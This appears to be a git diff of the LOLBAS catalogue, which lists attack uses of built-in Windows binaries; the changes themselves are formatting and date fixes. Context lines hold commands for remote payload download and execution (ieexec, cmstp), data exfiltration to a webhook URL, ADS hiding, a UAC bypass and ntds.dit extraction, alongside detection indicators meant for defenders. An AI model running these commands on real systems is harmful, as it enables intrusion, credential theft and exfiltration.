-14,7 +14,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. - Usecase: Execute code hidden within an inf file. Execute code directly from Internet. + Usecase: Execute code hidden within an inf file. Execute code directly from Internet. Category: AwL bypass Privileges: User MitreID: T1191 @@ -23,7 +23,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\cmstp.exe - Path: C:\Windows\SysWOW64\cmstp.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Execution of cmstp.exe should not be normal unless VPN is in use @@ -40,4 +40,4 @@ Acknowledgement: Handle: '@oddvarmoe' - Person: Nick Tyrer Handle: '@NickTyrer' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/ConfigSecurityPolicy.yml b/yml/OSBinaries/ConfigSecurityPolicy.yml index 0abab90..90c282c 100644 --- a/yml/OSBinaries/ConfigSecurityPolicy.yml +++ b/yml/OSBinaries/ConfigSecurityPolicy.yml @@ -2,7 +2,7 @@ Name: ConfigSecurityPolicy.exe Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads. Author: 'Ialle Teixeira' -Created: '04/09/2020' +Created: 2020-09-04 Commands: - Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile Description: Upload file, credentials or data exfiltration in general @@ -14,9 +14,9 @@ Commands: OperatingSystem: Windows 10 Full_Path: - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe -Code_Sample: - - Code: -Detection: +Code_Sample: + - Code: +Detection: - IOC: ConfigSecurityPolicy storing data into alternate data streams. - IOC: Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS. - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe. diff --git a/yml/OSBinaries/Control.yml b/yml/OSBinaries/Control.yml index 4abeb42..d130a0a 100644 --- a/yml/OSBinaries/Control.yml +++ b/yml/OSBinaries/Control.yml @@ -2,7 +2,7 @@ Name: Control.exe Description: Binary used to launch controlpanel items in Windows Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: control.exe c:\windows\tasks\file.txt:evil.dll Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS). @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\control.exe - Path: C:\Windows\SysWOW64\control.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Control.exe executing files from alternate data streams. @@ -28,4 +28,4 @@ Resources: Acknowledgement: - Person: Jimmy Handle: '@bohops' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Csc.yml b/yml/OSBinaries/Csc.yml index 3b19bdf..c792f90 100644 --- a/yml/OSBinaries/Csc.yml +++ b/yml/OSBinaries/Csc.yml @@ -1,8 +1,8 @@ --- Name: Csc.exe -Description: Binary file used by .NET to compile C# code +Description: Binary file used by .NET to compile C# code Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: csc.exe -out:My.exe File.cs Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe. @@ -23,13 +23,13 @@ Commands: Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe -Code_Sample: +Code_Sample: - Code: Detection: - - IOC: Csc.exe should normally not run a system unless it is used for development. + - IOC: Csc.exe should normally not run a system unless it is used for development. Resources: - Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe Acknowledgement: - - Person: + - Person: Handle: ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Cscript.yml b/yml/OSBinaries/Cscript.yml index 0027aba..f3ae9ac 100644 --- a/yml/OSBinaries/Cscript.yml +++ b/yml/OSBinaries/Cscript.yml @@ -2,7 +2,7 @@ Name: Cscript.exe Description: Binary used to execute scripts in Windows Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: cscript c:\ads\file.txt:script.vbs Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS). @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\cscript.exe - Path: C:\Windows\SysWOW64\cscript.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Cscript.exe executing files from alternate data streams @@ -25,4 +25,4 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Desktopimgdownldr.yml b/yml/OSBinaries/Desktopimgdownldr.yml index 97b2f85..2a0df33 100644 --- a/yml/OSBinaries/Desktopimgdownldr.yml +++ b/yml/OSBinaries/Desktopimgdownldr.yml @@ -2,7 +2,7 @@ Name: Desktopimgdownldr.exe Description: Windows binary used to configure lockscreen/desktop image Author: Gal Kristal -Created: 28/06/2020 +Created: 2020-06-28 Commands: - Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr Description: Downloads the file and sets it as the computer's lockscreen @@ -14,9 +14,9 @@ Commands: OperatingSystem: Windows 10 Full_Path: - Path: c:\windows\system32\desktopimgdownldr.exe -Code_Sample: - - Code: -Detection: +Code_Sample: + - Code: +Detection: - IOC: desktopimgdownldr.exe that creates non-image file - IOC: Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl Resources: diff --git a/yml/OSBinaries/Dfsvc.yml b/yml/OSBinaries/Dfsvc.yml index 07cf8ef..7cb34fc 100644 --- a/yml/OSBinaries/Dfsvc.yml +++ b/yml/OSBinaries/Dfsvc.yml @@ -2,9 +2,9 @@ Name: Dfsvc.exe Description: ClickOnce engine in Windows used by .NET Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo + - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo Description: Executes click-once-application from Url Usecase: Use binary to bypass Application whitelisting Category: AWL bypass @@ -17,14 +17,14 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe -Code_Sample: +Code_Sample: - Code: Detection: - - IOC: + - IOC: Resources: - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf - Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Diantz.yml b/yml/OSBinaries/Diantz.yml index 9c68aa5..f97b748 100644 --- a/yml/OSBinaries/Diantz.yml +++ b/yml/OSBinaries/Diantz.yml @@ -2,11 +2,11 @@ Name: Diantz.exe Description: Binary that package existing files into a cabinet (.cab) file Author: 'Tamir Yehuda' -Created: '08/08/2020' +Created: 2020-08-08 Commands: - Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file. - Usecase: Hide data compressed into an Alternate Data Stream. + Usecase: Hide data compressed into an Alternate Data Stream. Category: ADS Privileges: User MitreID: T1096 @@ -14,7 +14,7 @@ Commands: OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1. - Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab Description: Download and compress a remote file and store it in a cab file on local machine. - Usecase: Download and compress into a cab file. + Usecase: Download and compress into a cab file. Category: Download Privileges: User MitreID: T1105 @@ -23,9 +23,9 @@ Commands: Full_Path: - Path: c:\windows\system32\diantz.exe - Path: c:\windows\syswow64\diantz.exe -Code_Sample: - - Code: -Detection: +Code_Sample: + - Code: +Detection: - IOC: diantz storing data into alternate data streams. - IOC: diantz getting a file from a remote machine or the internet. Resources: diff --git a/yml/OSBinaries/Diskshadow.yml b/yml/OSBinaries/Diskshadow.yml index b0164e5..0cf6943 100644 --- a/yml/OSBinaries/Diskshadow.yml +++ b/yml/OSBinaries/Diskshadow.yml @@ -2,7 +2,7 @@ Name: Diskshadow.exe Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS). Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: diskshadow.exe /s c:\test\diskshadow.txt Description: Execute commands using diskshadow.exe from a prepared diskshadow script. @@ -23,7 +23,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\diskshadow.exe - Path: C:\Windows\SysWOW64\diskshadow.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Child process from diskshadow.exe @@ -33,4 +33,4 @@ Resources: Acknowledgement: - Person: Jimmy Handle: '@bohops' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Dnscmd.yml b/yml/OSBinaries/Dnscmd.yml index 18cf73c..d131ee4 100644 --- a/yml/OSBinaries/Dnscmd.yml +++ b/yml/OSBinaries/Dnscmd.yml @@ -2,7 +2,7 @@ Name: Dnscmd.exe Description: A command-line interface for managing DNS servers Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details. @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\Dnscmd.exe - Path: C:\Windows\SysWOW64\Dnscmd.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Dnscmd.exe loading dll from UNC path @@ -32,4 +32,4 @@ Acknowledgement: Handle: '@dim0x69' - Person: Nikhil SamratAshok Handle: '@nikhil_mitt' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Esentutl.yml b/yml/OSBinaries/Esentutl.yml index f33ba73..2768236 100644 --- a/yml/OSBinaries/Esentutl.yml +++ b/yml/OSBinaries/Esentutl.yml @@ -2,12 +2,12 @@ Name: Esentutl.exe Description: Binary for working with Microsoft Joint Engine Technology (JET) database Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o Description: Copies the source VBS file to the destination VBS file. Usecase: Copies files from A to B - Category: Copy + Category: Copy Privileges: User MitreID: T1105 MitreLink: https://attack.mitre.org/wiki/Technique/T1105 @@ -29,7 +29,7 @@ Commands: MitreLink: https://attack.mitre.org/wiki/Technique/T1096 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o - Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file. + Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file. Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure Category: ADS Privileges: User @@ -47,7 +47,7 @@ Commands: - Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit Description: Copies a (locked) file using Volume Shadow Copy Usecase: Copy/extract a locked file such as the AD Database - Category: Copy + Category: Copy Privileges: Admin MitreID: T1003 MitreLink: https://attack.mitre.org/techniques/T1003/ @@ -55,10 +55,10 @@ Commands: Full_Path: - Path: C:\Windows\System32\esentutl.exe - Path: C:\Windows\SysWOW64\esentutl.exe -Code_Sample: +Code_Sample: - Code: Detection: - - IOC: + - IOC: Resources: - Link: https://twitter.com/egre55/status/985994639202283520 - Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ diff --git a/yml/OSBinaries/Eventvwr.yml b/yml/OSBinaries/Eventvwr.yml index 235cb88..ead74be 100644 --- a/yml/OSBinaries/Eventvwr.yml +++ b/yml/OSBinaries/Eventvwr.yml @@ -2,11 +2,11 @@ Name: Eventvwr.exe Description: Displays Windows Event Logs in a GUI window. Author: 'Jacob Gajek' -Created: '2018-11-01' +Created: 2018-11-01 Commands: - Command: eventvwr.exe Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. - Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. + Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. Category: UAC bypass Privileges: User MitreID: T1088 diff --git a/yml/OSBinaries/Expand.yml b/yml/OSBinaries/Expand.yml index a4835a2..dfdb845 100644 --- a/yml/OSBinaries/Expand.yml +++ b/yml/OSBinaries/Expand.yml @@ -2,7 +2,7 @@ Name: Expand.exe Description: Binary that expands one or more compressed files Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: expand \\webdav\folder\file.bat c:\ADS\file.bat Description: Copies source file to destination. @@ -31,10 +31,10 @@ Commands: Full_Path: - Path: C:\Windows\System32\Expand.exe - Path: C:\Windows\SysWOW64\Expand.exe -Code_Sample: +Code_Sample: - Code: Detection: - - IOC: + - IOC: Resources: - Link: https://twitter.com/infosecn1nja/status/986628482858807297 - Link: https://twitter.com/Oddvarmoe/status/986709068759949319 @@ -43,4 +43,4 @@ Acknowledgement: Handle: '@infosecn1nja' - Person: Oddvar Moe Handle: '@oddvarmoe' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Explorer.yml b/yml/OSBinaries/Explorer.yml index 5b65019..5b1ed4c 100644 --- a/yml/OSBinaries/Explorer.yml +++ b/yml/OSBinaries/Explorer.yml @@ -2,7 +2,7 @@ Name: Explorer.exe Description: Binary used for managing files and system components within Windows Author: 'Jai Minton' -Created: '2020-06-24' +Created: 2020-06-24 Commands: - Command: explorer.exe /root,"C:\Windows\System32\calc.exe" Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe @@ -23,7 +23,7 @@ Commands: Full_Path: - Path: C:\Windows\explorer.exe - Path: C:\Windows\SysWOW64\explorer.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Multiple instances of explorer.exe or explorer.exe using the /root command line can help to detect this. diff --git a/yml/OSBinaries/Extexport.yml b/yml/OSBinaries/Extexport.yml index 424db7f..cf28b30 100644 --- a/yml/OSBinaries/Extexport.yml +++ b/yml/OSBinaries/Extexport.yml @@ -1,8 +1,8 @@ --- Name: Extexport.exe -Description: +Description: Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: Extexport.exe c:\test foo bar Description: Load a DLL located in the c:\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Program Files\Internet Explorer\Extexport.exe - Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Extexport.exe loads dll and is execute from other folder the original path @@ -24,4 +24,4 @@ Resources: Acknowledgement: - Person: Adam Handle: '@hexacorn' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Extrac32.yml b/yml/OSBinaries/Extrac32.yml index 3addec9..57c9f8f 100644 --- a/yml/OSBinaries/Extrac32.yml +++ b/yml/OSBinaries/Extrac32.yml @@ -1,12 +1,12 @@ --- Name: Extrac32.exe -Description: +Description: Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file. - Usecase: Extract data from cab file and hide it in an alternate data stream. + Usecase: Extract data from cab file and hide it in an alternate data stream. Category: ADS Privileges: User MitreID: T1096 @@ -14,7 +14,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file. - Usecase: Extract data from cab file and hide it in an alternate data stream. + Usecase: Extract data from cab file and hide it in an alternate data stream. Category: ADS Privileges: User MitreID: T1096 @@ -39,10 +39,10 @@ Commands: Full_Path: - Path: C:\Windows\System32\extrac32.exe - Path: C:\Windows\SysWOW64\extrac32.exe -Code_Sample: +Code_Sample: - Code: Detection: - - IOC: + - IOC: Resources: - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f diff --git a/yml/OSBinaries/Findstr.yml b/yml/OSBinaries/Findstr.yml index 95668b9..f0a10af 100644 --- a/yml/OSBinaries/Findstr.yml +++ b/yml/OSBinaries/Findstr.yml @@ -1,8 +1,8 @@ --- Name: Findstr.exe -Description: +Description: Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. @@ -39,7 +39,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\findstr.exe - Path: C:\Windows\SysWOW64\findstr.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: finstr.exe should normally not be invoked on a client system @@ -49,4 +49,4 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Forfiles.yml b/yml/OSBinaries/Forfiles.yml index 38d3189..4ebc2a6 100644 --- a/yml/OSBinaries/Forfiles.yml +++ b/yml/OSBinaries/Forfiles.yml @@ -2,7 +2,7 @@ Name: Forfiles.exe Description: Selects and executes a command on a file or set of files. This command is useful for batch processing. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder. @@ -23,10 +23,10 @@ Commands: Full_Path: - Path: C:\Windows\System32\forfiles.exe - Path: C:\Windows\SysWOW64\forfiles.exe -Code_Sample: +Code_Sample: - Code: Detection: - - IOC: + - IOC: Resources: - Link: https://twitter.com/vector_sec/status/896049052642533376 - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f @@ -36,4 +36,4 @@ Acknowledgement: Handle: '@vector_sec' - Person: Oddvar Moe Handle: '@oddvarmoe' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Ftp.yml b/yml/OSBinaries/Ftp.yml index 3476a96..cbb056d 100644 --- a/yml/OSBinaries/Ftp.yml +++ b/yml/OSBinaries/Ftp.yml @@ -2,7 +2,7 @@ Name: Ftp.exe Description: A binary designed for connecting to FTP servers Author: 'Oddvar Moe' -Created: '2018-12-10' +Created: 2018-12-10 Commands: - Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt Description: Executes the commands you put inside the text file. @@ -23,7 +23,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\ftp.exe - Path: C:\Windows\SysWOW64\ftp.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: cmd /c as child process of ftp.exe diff --git a/yml/OSBinaries/GfxDownloadWrapper.yml b/yml/OSBinaries/GfxDownloadWrapper.yml index 8a251aa..edb36da 100644 --- a/yml/OSBinaries/GfxDownloadWrapper.yml +++ b/yml/OSBinaries/GfxDownloadWrapper.yml @@ -2,7 +2,7 @@ Name: GfxDownloadWrapper.exe Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path. Author: Jesus Galvez -Created: Jesus Galvez +Created: 2019-12-27 Commands: - Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE" Description: GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service". @@ -169,7 +169,7 @@ Full_Path: - Path: c:\windows\system32\driverstore\filerepository\ki132574.inf_amd64_54c9b905b975ee55\ - Path: c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\ - Path: c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\ -Detection: +Detection: - IOC: Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com. Resources: - Link: https://www.sothis.tech/author/jgalvez/ diff --git a/yml/OSBinaries/Gpscript.yml b/yml/OSBinaries/Gpscript.yml index 81fae7a..aeed0cc 100644 --- a/yml/OSBinaries/Gpscript.yml +++ b/yml/OSBinaries/Gpscript.yml @@ -1,8 +1,8 @@ --- Name: Gpscript.exe -Description: Used by group policy to process scripts +Description: Used by group policy to process scripts Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: Gpscript /logon Description: Executes logon scripts configured in Group Policy. @@ -23,7 +23,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\gpscript.exe - Path: C:\Windows\SysWOW64\gpscript.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Scripts added in local group policy @@ -33,4 +33,4 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml index 55f5471..bddcc05 100644 --- a/yml/OSBinaries/Hh.yml +++ b/yml/OSBinaries/Hh.yml @@ -2,7 +2,7 @@ Name: Hh.exe Description: Binary used for processing chm files in Windows Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: HH.exe http://some.url/script.ps1 Description: Open the target PowerShell script with HTML Help. @@ -23,7 +23,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\hh.exe - Path: C:\Windows\SysWOW64\hh.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: hh.exe should normally not be in use on a normal workstation @@ -32,4 +32,4 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Ie4uinit.yml b/yml/OSBinaries/Ie4uinit.yml index ad141e3..86b87f4 100644 --- a/yml/OSBinaries/Ie4uinit.yml +++ b/yml/OSBinaries/Ie4uinit.yml @@ -1,8 +1,8 @@ --- Name: Ie4uinit.exe -Description: +Description: Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: ie4uinit.exe -BaseSettings Description: Executes commands from a specially prepared ie4uinit.inf file. @@ -17,7 +17,7 @@ Full_Path: - Path: c:\windows\sysWOW64\ie4uinit.exe - Path: c:\windows\system32\ieuinit.inf - Path: c:\windows\sysWOW64\ieuinit.inf -Code_Sample: +Code_Sample: - Code: Detection: - IOC: ie4uinit.exe loading a inf file from outside %windir% @@ -26,4 +26,4 @@ Resources: Acknowledgement: - Person: Jimmy Handle: '@bohops' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Ieexec.yml b/yml/OSBinaries/Ieexec.yml index 922efda..8b46933 100644 --- a/yml/OSBinaries/Ieexec.yml +++ b/yml/OSBinaries/Ieexec.yml @@ -2,9 +2,9 @@ Name: Ieexec.exe Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe + - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe Description: Downloads and executes bypass.exe from the remote server. Usecase: Download and run attacker code from remote location Category: Download @@ -12,7 +12,7 @@ Commands: MitreID: T1105 MitreLink: https://attack.mitre.org/wiki/Technique/T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe + - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe Description: Downloads and executes bypass.exe from the remote server. Usecase: Download and run attacker code from remote location Category: Execute @@ -23,13 +23,13 @@ Commands: Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe -Code_Sample: +Code_Sample: - Code: Detection: - - IOC: + - IOC: Resources: - Link: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/ Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Ilasm.yml b/yml/OSBinaries/Ilasm.yml index 3cbd1b6..7b4ab0c 100644 --- a/yml/OSBinaries/Ilasm.yml +++ b/yml/OSBinaries/Ilasm.yml @@ -2,7 +2,7 @@ Name: Ilasm.exe Description: used for compile c# code into dll or exe. Author: Hai vaknin (lux) -Created: 17/03/2020 +Created: 2020-03-17 Commands: - Command: ilasm.exe C:\public\test.txt /exe Description: Binary file used by .NET to compile c# code to .exe @@ -11,7 +11,7 @@ Commands: Privileges: User MitreID: T1127 MitreLink: https://attack.mitre.org/techniques/T1127/ - OperatingSystem: Windows 10,7 + OperatingSystem: Windows 10,7 - Command: ilasm.exe C:\public\test.txt /dll Description: Binary file used by .NET to compile c# code to dll Usecase: A description of the usecase @@ -22,7 +22,7 @@ Commands: Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe -Code_Sample: +Code_Sample: - Code: Resources: - Link: https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt diff --git a/yml/OSBinaries/Infdefaultinstall.yml b/yml/OSBinaries/Infdefaultinstall.yml index a99c341..81e9657 100644 --- a/yml/OSBinaries/Infdefaultinstall.yml +++ b/yml/OSBinaries/Infdefaultinstall.yml @@ -2,7 +2,7 @@ Name: Infdefaultinstall.exe Description: Binary used to perform installation based on content inside inf files Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: InfDefaultInstall.exe Infdefaultinstall.inf Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file. @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\Infdefaultinstall.exe - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe -Code_Sample: +Code_Sample: - Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a Detection: - IOC: @@ -25,4 +25,4 @@ Resources: Acknowledgement: - Person: Kyle Hanslovan Handle: '@kylehanslovan' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml index 53283d6..d1a5763 100644 --- a/yml/OSBinaries/Installutil.yml +++ b/yml/OSBinaries/Installutil.yml @@ -2,7 +2,7 @@ Name: Installutil.exe Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll Description: Execute the target .NET DLL or EXE. @@ -25,7 +25,7 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: @@ -39,4 +39,4 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Jsc.yml b/yml/OSBinaries/Jsc.yml index 6679d5e..a30c11a 100644 --- a/yml/OSBinaries/Jsc.yml +++ b/yml/OSBinaries/Jsc.yml @@ -2,7 +2,7 @@ Name: Jsc.exe Description: Binary file used by .NET to compile javascript code to .exe or .dll format Author: 'Oddvar Moe' -Created: '2019-05-31' +Created: 2019-05-31 Commands: - Command: jsc.exe scriptfile.js Description: Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe. @@ -25,14 +25,14 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Jsc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Jsc.exe -Code_Sample: +Code_Sample: - Code: Detection: - - IOC: Jsc.exe should normally not run a system unless it is used for development. + - IOC: Jsc.exe should normally not run a system unless it is used for development. Resources: - Link: https://twitter.com/DissectMalware/status/998797808907046913 - Link: https://www.phpied.com/make-your-javascript-a-windows-exe/ Acknowledgement: - 